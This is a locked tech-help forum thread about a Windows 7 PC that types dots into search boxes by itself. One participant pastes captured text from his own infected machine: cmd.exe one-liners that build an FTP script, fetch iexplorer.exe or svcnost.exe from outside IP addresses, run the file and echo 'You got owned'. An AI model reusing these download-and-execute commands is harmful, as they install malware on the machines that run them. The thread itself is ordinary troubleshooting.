We use cookies to provide you with a better experience. If you continue to use this site, we'll assume you're happy with this. Alternatively, click here to find out how to manage these cookies

hide cookie message
Contact Forum Editor

Send an email to our Forum Editor:

PLEASE NOTE: Your name is used only to let the Forum Editor know who sent the message. Both your name and email address will not be used for any other purpose.

Tech Helproom

It's free to register, to post a question or to start / join a discussion

Dots in search and google

Fruit Bat /\0/\
Resolved

Likes # 0

Odd one here

Windows 7 home premium as soon as start button clicked dots start appearing in the search box (just like entering a password)

Same happens on IE on Google homepage search box

Scanned with up to date Avast, SAS and Malwarebytes nothing found. Cleaned with CCleaner

Nothing suspicious seen in startups, sfc reports integrity OK.

Google search shows similar for Android phones but no answers.

All ideas welcome :0)

Like this post
Woolwell

Likes # 0

I hope it is not a key logger.

Like this post
robinofloxley

Likes # 0

I have had problems since Dec I think with a text script appearing, usually in FF search box which is often open.

But it can appear elsewhere with whatever has focus. I have been able to capture some of the script. It's not dots, but I will report anyway.

Intermittently, even with FF open but idle, chimes will sound and dialog boxes flash up and text will scroll like a tickertape through the Find box say. I shutdown quick and run scans but never find anything.

I have even done two factory restores in last months. Tried MBAM/SAS/Spybot/Avira/Avast/AVG/Emisoft/various AV boot disks/Combofix and others. I never seem to find anything.

Problem may reappear same day or next or disappear for weeks.

On one occasion I saw "You got owned" echoed. It gave me something to Google. I suspect or hope that this is the remnants of a virus/rootkit that is no longer fully functional.

Latest 3 days ago seems to have gone again. Panda Antivirus Pro 2012 (90 day trial) It found a shedload of threats (70+) when all other scanners found nowt. Mainly relating to advertising junk though. Only time will tell if it is gone this time.

Panda Activescan online also seems quite good (no need to disable existing AV) and will do a full or partial system scan. Try it from FF 3.6.17 max or IE9 (I only sussed that out today)

Following are the texts I see instead of dots. Hope you suss out your probs.

If yours is related, keywords may be svcnost.exe iexplorer.exe "You got owned" virus.

But frankly, there are so many hits and ideas, I got bogged down. And these scans take so long.

Partial grabs of the 'tickertape'. MyREMs and oxos are my comments.

MyREM 09/12/2010

ystemroot%\system32\cmd.exe del eq&echo open 186.84.116.149 3944 >> eq&echo user 23561 24386 >> eq &echo get iexplorer.exe >> eq &echo quit >> eq &ftp -n -s:eq &iexplorer.exe &del eq

oxo

MyREM 12/12/2010

temroot%\system32\cmd.exedel eq&echo open 190.105.126.98 30000 >> eq&echo user 3752 25897 >> eq &echo get iexplorer.exe >> eq &echo quit >> eq &ftp -n -s:eq &iexplorer.exe &del eq

oxo

MyREM 12/12/2010?

%\system32\cmd.exedel eq&echo open 190.158.29.10 24668 >> eq&echo user 27283 285 >> eq &echo get iexplorer.exe >> eq &echo quitp -n -s:eq &iexplorer.exe &del eq

oxo

MyREM 09/07/2011?Poss months earlier and lost file datestamp

ik &echo get svcnost.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &svcnost.exe &exit echo You got owned

oxo

MyREM 02/09/2011

del eq&echo open 192.168.1.109 2945 >> eq&echo user 18151 11904 >> eq &echo get iexplorer.exe >> eq &echo quit >> eq &ftp -n -s:eq &iexplorer.exe &del eq

Like this post
robinofloxley

Likes # 0

Note: Google doesn't like searching for svcnost and iexplorer. It wants svchost and iexplore.

Make sure you ask nicely.

http://www.google.co.uk/search?q=svcnost+iexplorer+virus+%22You+got+owned%22&ie=utf-8&oe=utf-8&aq=t&client=firefox-a&rlz=1R1GGHPen__GB430

Like this post
Fruit Bat /\0/\

Likes # 0

scheduled scan with Avast nothing found

Like this post
Covergirl

Likes # 0

Turn off PC

Invert keyboard over clean sheet of A3

Rattle/ severely agitate keys whilst keyboard inverted

When things stop dropping onto A3, examine debris.

Switch PC back on

Problem solved?

(You can also use a paintbrush between the keys or a compressed air supply.)

Like this post
buteman

Likes # 0

Covergirl

You may have something there, I remember cleaning my keyboard using compressed air round about the same time that I was having the same sort of problem.

Like this post
Fruit Bat /\0/\

Likes # 0

Thanks for all the ideas so far :0)

Just powered it up to have another go and the problem seems to have disappeared - I'll leave powered up for awhile and see what happens.

Like this post
Fruit Bat /\0/\

Likes # 0

Argh....

Problem returned after a reboot :0(

Like this post
buteman

Likes # 0

Another Firefox update available.6.0.2

Also another update for Avast 6.0.1289

You never know it may help.

Like this post
Fruit Bat /\0/\

Likes # 0

It stopped doing it in Google but still putting about 50 *(stars) in the search box if clicked on..

Gave up on this one had to give the machine back before I went on holiday, have heard nothing since, so assuming owner is living with it.

Like this post  

Reply to this topic

This thread has been locked.

IDG UK Sites

45 Best Android games: top Android games for your smartphone or tablet in 2014 (24 are free!)

IDG UK Sites

How Apple, Adobe, Microsoft and others have let us down over UltraHD and hiDPI screens

IDG UK Sites

Do you have the X-Factor too? Mix Off app puts fans in the frame

IDG UK Sites

iPad Pro release date, rumours and leaked images - 12.9 screen 'coming in 2015'